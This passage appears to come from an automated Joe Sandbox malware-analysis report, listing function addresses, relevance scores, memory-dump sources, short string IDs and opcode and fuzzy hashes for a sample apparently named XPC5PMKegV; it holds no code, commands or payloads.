              • Opcode ID: d48262401abb25fa91984b461b4a848eb6d9eca4c878f920186a1398ce78abfd
              • Instruction ID: 93ca7715116f7ecdf873a95db3da9d3424092fe951cb2b90cd3ace3cc634c7cf
              • Opcode Fuzzy Hash: d48262401abb25fa91984b461b4a848eb6d9eca4c878f920186a1398ce78abfd
              • Instruction Fuzzy Hash: 6781C371A08A4A8FDB85EF68D4A95FE37A0FF16314F0445BAD059D7192DE39B850CBC0
              Function 00007FFD347A050C Relevance: 8.9, Strings: 7, Instructions: 168COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: 1$?$H$K$L$k${
              • API String ID: 0-824296765
              • Opcode ID: fc63a095bf50283b7f9708ee5495722bc4b337046482050193d6526e39027488
              • Instruction ID: 1da73880857f3b9970290e7c34e6610b647c5e1546f93b488dd1a371d4ba7320
              • Opcode Fuzzy Hash: fc63a095bf50283b7f9708ee5495722bc4b337046482050193d6526e39027488
              • Instruction Fuzzy Hash: 65611D70E19A69CBDBA8DF18CCA57ADB7B5FB55301F1001FAD10DE2291DA386A81CF41
              Function 00007FFD3479EB56 Relevance: 3.8, Strings: 3, Instructions: 53COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: P$j${
              • API String ID: 0-2719876955
              • Opcode ID: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction ID: 927678251de0ec49911dab89f03573bdfcfb8db48f51b27e053b5e34f2b49a8f
              • Opcode Fuzzy Hash: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction Fuzzy Hash: 4B21ECB0D19629CFEB64DF14C8947E8B6F5AB59301F0041FAD60DE2281CB7C6A94DF85
              Function 00007FFD3479DD31 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: Ng4$p\g4
              • API String ID: 0-3099952731
              • Opcode ID: 22566a96872972ea24fbe135fa3bd536afb6e9c8661100968bbf4e74c05ffed4
              • Instruction ID: b6efbf5196f2bf70937f540b8b2017f24b6f740eb14c3b28659e6505e7b3cd7a
              • Opcode Fuzzy Hash: 22566a96872972ea24fbe135fa3bd536afb6e9c8661100968bbf4e74c05ffed4
              • Instruction Fuzzy Hash: 56E12F71E18A598FEBA8DF68C4A57BCB7E1FF59304F1441BAD00DE7292CA386840DB41
              Function 00007FFD3479D079 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: #t
              • API String ID: 0-1562333614
              • Opcode ID: 4305c356b8f6cfc48cae75e0d90a8275c72b876516acd28ae72a3d5184507196
              • Instruction ID: 3a1c27d4ce4ec8dd2725e76a80aa213782e3f005845d92261c97d30b912696a8
              • Opcode Fuzzy Hash: 4305c356b8f6cfc48cae75e0d90a8275c72b876516acd28ae72a3d5184507196
              • Instruction Fuzzy Hash: 6B41B371A0890ACFEB94EF6894A92FD77E0FF19315F00057AD80DD2292DE34B594CB81
              Function 00007FFD3479ED2A Relevance: 1.4, Strings: 1, Instructions: 118COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: 1
              • API String ID: 0-2212294583
              • Opcode ID: b7c1ad248a9d3cfe442eb7ad83bdd642a49057f60c80019b490a0873dd28929c
              • Instruction ID: a8cabf93d38740024345727fd3974feec2615986d980a3c3cfaface4e83627cb
              • Opcode Fuzzy Hash: b7c1ad248a9d3cfe442eb7ad83bdd642a49057f60c80019b490a0873dd28929c
              • Instruction Fuzzy Hash: B8411A71A18A598FDBA8DB18CC95BADB3B1FB54301F1401EAD44DE3291DE356EC18F40
              Function 00007FFD3479C562 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: Q_H
              • API String ID: 0-1722020806
              • Opcode ID: edaa240c9db56afbde41697220ee6d8c53717bfbd0de2de613a339908640f3d0
              • Instruction ID: c25fa1d38dd96b0ed94a3753560548ad88f394df9acdaf03e633fbf12cff7968
              • Opcode Fuzzy Hash: edaa240c9db56afbde41697220ee6d8c53717bfbd0de2de613a339908640f3d0
              • Instruction Fuzzy Hash: B731BAB1E1891D9FEF94EB5898A56ACB7B1FFAA300F501139D10DE3281DE2868419B40
              Function 00007FFD34790A01 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: 8vh4
              • API String ID: 0-3359051434
              • Opcode ID: 2e2c860b4debc28ed421aa9ea3a440834d0a2151ecee28191629e352b0ff42b2
              • Instruction ID: 4a2f75aaaabbeab8033754174e09ce9e39039b595e57bb59362a437676a2e52f
              • Opcode Fuzzy Hash: 2e2c860b4debc28ed421aa9ea3a440834d0a2151ecee28191629e352b0ff42b2
              • Instruction Fuzzy Hash: 15119171E2854E8FE790EF68C8992BE77E1FF1A310F4145B6C508D61A2EE38B540D780
              Function 00007FFD3479124D Relevance: 1.3, Strings: 1, Instructions: 57COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: pyh4
              • API String ID: 0-2647341381
              • Opcode ID: f95d571810451aa7e5491a3421520000e88662309b4a1d6bf5609c117171e9d8
              • Instruction ID: dc650328dd4a99d55834710986662a36cf1595151db8f14b8c458e0661874ea6
              • Opcode Fuzzy Hash: f95d571810451aa7e5491a3421520000e88662309b4a1d6bf5609c117171e9d8
              • Instruction Fuzzy Hash: 0111C171B0968A8EFB99AF64C4A82BD7BE0FF5A300F0404BED50AD61D2DE38A550D740
              Function 00007FFD3479FBA6 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: !
              • API String ID: 0-2657877971
              • Opcode ID: bea191dfd14c9a9f3d461b50cd3b119532132900a2a499a04bbe4867a97674a6
              • Instruction ID: 70e2e6e77d98fead7b93ddbba2a3be3b272f5fd23013d9b45b1b244308e626c4
              • Opcode Fuzzy Hash: bea191dfd14c9a9f3d461b50cd3b119532132900a2a499a04bbe4867a97674a6
              • Instruction Fuzzy Hash: C8110071A0961A8BDBA8DF44C8A57A977B5EB55311F0041F9C10DD2281CF346A81DF80
              Function 00007FFD34791260 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: pyh4
              • API String ID: 0-2647341381
              • Opcode ID: 2b6dfb072f37488d02ecbf039f1dfe432b5dcfed56b4edb2e14891301bce178f
              • Instruction ID: 46d2eeb830f0a3a65a73515e04597f1addc06d235922b95efe076020510948d1
              • Opcode Fuzzy Hash: 2b6dfb072f37488d02ecbf039f1dfe432b5dcfed56b4edb2e14891301bce178f
              • Instruction Fuzzy Hash: D2F0A471F1954E8AFF98ABA485A82F977E4FF56304F04007AE519D10C2DE286514D680
              Function 00007FFD347916C8 Relevance: .3, Instructions: 284COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10c550925e895b7b54b72724d769e8f45d8e916000d97935d318d1f74e7e08fe
              • Instruction ID: 8e298af41b894b31546342cb930d954c4866487b84085c9842d31012ce374ed0
              • Opcode Fuzzy Hash: 10c550925e895b7b54b72724d769e8f45d8e916000d97935d318d1f74e7e08fe
              • Instruction Fuzzy Hash: EB91C271B0CA4A8FEB59DE1C88A55B977E2FF99304B14057AE54DD3282CE38BC12C781
              Function 00007FFD34790CF8 Relevance: .3, Instructions: 262COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 787855613e0b7d26029ac5b281da34a72f526ffdaae076a157b668004bf37c2b
              • Instruction ID: 9b7ddfef465d601e78abbc8761f8fd03904db0a117dac99ce22c77c4b61dfe74
              • Opcode Fuzzy Hash: 787855613e0b7d26029ac5b281da34a72f526ffdaae076a157b668004bf37c2b
              • Instruction Fuzzy Hash: 7B91D871F1994D8FEBA4EB688865BE9B3B1FF56310F0042B9D00DE7192DE3879459B80
              Function 00007FFD3479CBF5 Relevance: .2, Instructions: 238COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e3c5f50f24cc2b5959eb1d12767af082762111b597788b3e840a73fc21c4dd71
              • Instruction ID: b566fe8d34800dc95b0fa057ae94775147e1e6f390441892f4d90483b0e3f903
              • Opcode Fuzzy Hash: e3c5f50f24cc2b5959eb1d12767af082762111b597788b3e840a73fc21c4dd71
              • Instruction Fuzzy Hash: B1710572B1C65A8FEB55BBA8E4A50FD7BA0EF43325F0405BBD208C6093DE283449D791
              Function 00007FFD34791D0B Relevance: .2, Instructions: 167COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97a3ab71b8d4c6437a8a426e355b77efb6fc1733609009485d499e05a036e0e5
              • Instruction ID: 9072b870c280f357b7be7ddcef9182d4fb92e93659a46e0f527a4e4d81df1fe8
              • Opcode Fuzzy Hash: 97a3ab71b8d4c6437a8a426e355b77efb6fc1733609009485d499e05a036e0e5
              • Instruction Fuzzy Hash: 5251E470B18A4A8FEB5CDE1888A55BA73E2FF99304B14457ED54EC3281CE34B812C7C1
              Function 00007FFD34793155 Relevance: .2, Instructions: 166COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bdfb7ee2cfcc289152565468707c226789c866d16a3eefb45fc0d7d3bf7b5d8c
              • Instruction ID: b8655ed5254d40ed18c59696bc37cc7370571cc8cd4893659c10ffc6f18972c2
              • Opcode Fuzzy Hash: bdfb7ee2cfcc289152565468707c226789c866d16a3eefb45fc0d7d3bf7b5d8c
              • Instruction Fuzzy Hash: 065109B1E1851ACFEB54EF94C4A46ED77F1FF4A311F500179D109E7292DA38A944DB80
              Function 00007FFD34792115 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8cfbf77458725c56d4a73f3200853abd2da927fc00665633007eb2bd995d0514
              • Instruction ID: 2ab9720adfa7c9193a4a49d338251a88bf0a70b7489bfe6cb560fd40dcd99b4f
              • Opcode Fuzzy Hash: 8cfbf77458725c56d4a73f3200853abd2da927fc00665633007eb2bd995d0514
              • Instruction Fuzzy Hash: 2C413671B0DA4A8FE795EB7894A51B977E1EF87300F0549BBD50DC72A2DE2CB8418381
              Function 00007FFD34791DA3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9929934709bb1a7b455dc6780ddf9ad101c985a925a1c61815ef1dbc21a691b
              • Instruction ID: 10098bcdb8c23f32b2118788cc0114741fd3f8bbd287b8adba7b80565fd66168
              • Opcode Fuzzy Hash: a9929934709bb1a7b455dc6780ddf9ad101c985a925a1c61815ef1dbc21a691b
              • Instruction Fuzzy Hash: DB316070B18A4A8FDB4CDE1CC8A557A73E2FBD9345B14463EE54AD3285CE34E8128B81
              Function 00007FFD34792C28 Relevance: .1, Instructions: 103COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f4b0b55f3c7f1ac8e1193a3c75acc01b5f8052d5ae0537be5237ed40a968e56
              • Instruction ID: 111270e88e599a75bc175e1e0efadb1df5de53465573cee5dd8bf8016707b3e1
              • Opcode Fuzzy Hash: 0f4b0b55f3c7f1ac8e1193a3c75acc01b5f8052d5ae0537be5237ed40a968e56
              • Instruction Fuzzy Hash: 7E21A257A4E7966AE35276B868B70FA3FA48F13328B0805B3E58CC9093EC08605D9291
              Function 00007FFD3479C5DA Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b1713b35a72a26fdc9dd8b694d343e5fe0ac7fecac48adc6154a64401e746cd0
              • Instruction ID: 082edb592343e9fdd6899a60f1165915bfa6fe0c598e24b5cf39059f1dac1a99
              • Opcode Fuzzy Hash: b1713b35a72a26fdc9dd8b694d343e5fe0ac7fecac48adc6154a64401e746cd0
              • Instruction Fuzzy Hash: E221CEB1E1C91DCFEF94EB5898A96ACB7B1FF5A300F50113AD10DE7282DE2868419B40
              Function 00007FFD34792C60 Relevance: .1, Instructions: 95COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f95157fbaad39cd216970c64b69b243bae0aafcdd879550cab456d88aeadd67c
              • Instruction ID: 087bcd66cd31bdcd08b6ada92eea6d1dfcdd21e529e523bfcb3a7c3fcd9b020d
              • Opcode Fuzzy Hash: f95157fbaad39cd216970c64b69b243bae0aafcdd879550cab456d88aeadd67c
              • Instruction Fuzzy Hash: 7621D866A4E3869FE752B77858A61F93FE0DF17318F0808B3D588CA093ED18614DD381
              Function 00007FFD3479C737 Relevance: .1, Instructions: 95COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 61630e4b97f7f4915eedcede016753b816dd77c90d5bd38421ca9d197ab028bb
              • Instruction ID: 9dd37b0e66fc6c4620f6da92d4739cc739f0197f62d567584464177112fdb490
              • Opcode Fuzzy Hash: 61630e4b97f7f4915eedcede016753b816dd77c90d5bd38421ca9d197ab028bb
              • Instruction Fuzzy Hash: DA31D17194D2CA8FDB469B7088BA1FA3FB4AF07310F0901EBD449CB5A3DA2D6146C352
              Function 00007FFD3479CC5D Relevance: .1, Instructions: 93COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b760532c19f28439af31a2592cddd4ac99cecb9f44dda7eb368a403367b0210
              • Instruction ID: e3a45d21b9232f757f23962f0375705f2de4c3a4b6ec975e38ff5bd7e05dc063
              • Opcode Fuzzy Hash: 0b760532c19f28439af31a2592cddd4ac99cecb9f44dda7eb368a403367b0210
              • Instruction Fuzzy Hash: 2F317CB6B089178FEB55BAA8A4A60FD7B90EF53339F040537D60CD6093DE2C3495A2D4
              Function 00007FFD3479B2E4 Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ebeae644347bd35c41a14f2ee87af6016315027c725bb7f02a16c39443e8e44
              • Instruction ID: bad0c6e32f0528685a24eb291b6fed96262452d12e6282e31b670d2bf45c8602
              • Opcode Fuzzy Hash: 2ebeae644347bd35c41a14f2ee87af6016315027c725bb7f02a16c39443e8e44
              • Instruction Fuzzy Hash: 9021AE71A1890ECEEB50EB6888AD6B977E5FF4A300F4049B6D11CD31A6EE38B540D780
              Function 00007FFD347933F1 Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction ID: ae6b2ee9e1b5831e2c475b2672928606ae44ecc5361abcae0f8f17591d7068b2
              • Opcode Fuzzy Hash: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction Fuzzy Hash: 27217F70A4864ECFEB95EB6488A92BA77E0FF1A304F0008BAD419D6191DF38A554D781
              Function 00007FFD3479CADD Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8fdec384804a78b35bf53f827fbce6f0929804a1db8bfd79fc65f7c98cfa6bb
              • Instruction ID: 6277146cc20434783b63cfd3302ffea5464e0dfa1d7a2b64b4ad23f7282c9e68
              • Opcode Fuzzy Hash: b8fdec384804a78b35bf53f827fbce6f0929804a1db8bfd79fc65f7c98cfa6bb
              • Instruction Fuzzy Hash: 85219771A0890D8FEBA4EB74C8A96BDB7A1EF59300F10007ED10ED7291DE797881DB81
              Function 00007FFD3479D0E3 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9e2fd3de7140da05ac55b406476183f3ec58f5319f211f7e2e3ddc696cc2c6d
              • Instruction ID: 8185ad2e9fffc4b9c82580ca85f0814949a3d4e03cadf4b3025e827ea67bca5e
              • Opcode Fuzzy Hash: f9e2fd3de7140da05ac55b406476183f3ec58f5319f211f7e2e3ddc696cc2c6d
              • Instruction Fuzzy Hash: AD21CF71A1891E8FDBA4EB98D4A56FE77E0FF5A304F00003AD14AE2281DE386440CB91
              Function 00007FFD3479A921 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction ID: 470d1fbb3d9cddcb7076282c2ba81f86d7dfa25d17a5c9f252dffec1be3b4f6f
              • Opcode Fuzzy Hash: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction Fuzzy Hash: 0B214A70A1864D8FDB89EF68C495AE93BF0FF69315F01416AE80AD7251DB34E951CB80
              Function 00007FFD34793350 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction ID: 9ba8daaf3d6f6c91b7e397311d111ef2c5d19fe09b82ca086385cd23cb80280a
              • Opcode Fuzzy Hash: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction Fuzzy Hash: 6E21C67054D28A8FD342EBB488686A97FF0FF4B310F0544E6C045CB062DA3C9545C750
              Function 00007FFD3479CBB5 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 66c876d926123f067fa2a3272ba1ff3c85342f7f0ccbe924d23b3ab7717de496
              • Instruction ID: e34123bd6c597a6223e16deb437388c903f804163dab6d649384c875255d1efe
              • Opcode Fuzzy Hash: 66c876d926123f067fa2a3272ba1ff3c85342f7f0ccbe924d23b3ab7717de496
              • Instruction Fuzzy Hash: CD1172B1A18A0ECFEB81DF28C4956F937E0FF26311F001576D419C3161EB38A961DB81
              Function 00007FFD3479B031 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b44569bfd297cb4437c2052d890d7273d38faae96b79af02a10be8a6ef508e7
              • Instruction ID: d743c6c9a61e03e5717f0e8e854e8e47bd8b19235aa41fb1f65282746a149bca
              • Opcode Fuzzy Hash: 9b44569bfd297cb4437c2052d890d7273d38faae96b79af02a10be8a6ef508e7
              • Instruction Fuzzy Hash: B8117F70A1860E8FDB94EF68C4996BE77E1FF59301F10497AD41ED3291DB35A054CB80
              Function 00007FFD3479085D Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 69fcc99c5b6e9c6b8b9053a0af3ba9319b06c542507c7006d33d69824c2ed14e
              • Instruction ID: 6e2a7c2fe37166a7d79d2f26f899b31e7cd083db20bc9abaeef61836f3f5a2fa
              • Opcode Fuzzy Hash: 69fcc99c5b6e9c6b8b9053a0af3ba9319b06c542507c7006d33d69824c2ed14e
              • Instruction Fuzzy Hash: 0401F562B2C6CADEE751EBB884A89A937E0EF57300F1144B2C548C6053ED38B485C2D1
              Function 00007FFD3479B07D Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 979ac7b0f62720007868f36421bc70484890aad94b96e352f4e6915ab93e69f6
              • Instruction ID: 31c739a0ccc9a7a17615e56d75be6cf0f961fb9ec9de50396bbacde81b24cbf6
              • Opcode Fuzzy Hash: 979ac7b0f62720007868f36421bc70484890aad94b96e352f4e6915ab93e69f6
              • Instruction Fuzzy Hash: AF11C170A08A4E8FDB85EF28C8952FA77E0FF19305F10097AD848C3651DB34A064CB81
              Function 00007FFD3479BB78 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 26ade4c38bff0957324175062bac1e0300ffba8ef09ac2e86a3ac14cb082b64b
              • Instruction ID: 79649380729881e8c73a4f28e237d3a10755c17b55b4021d28905f5d404a13ea
              • Opcode Fuzzy Hash: 26ade4c38bff0957324175062bac1e0300ffba8ef09ac2e86a3ac14cb082b64b
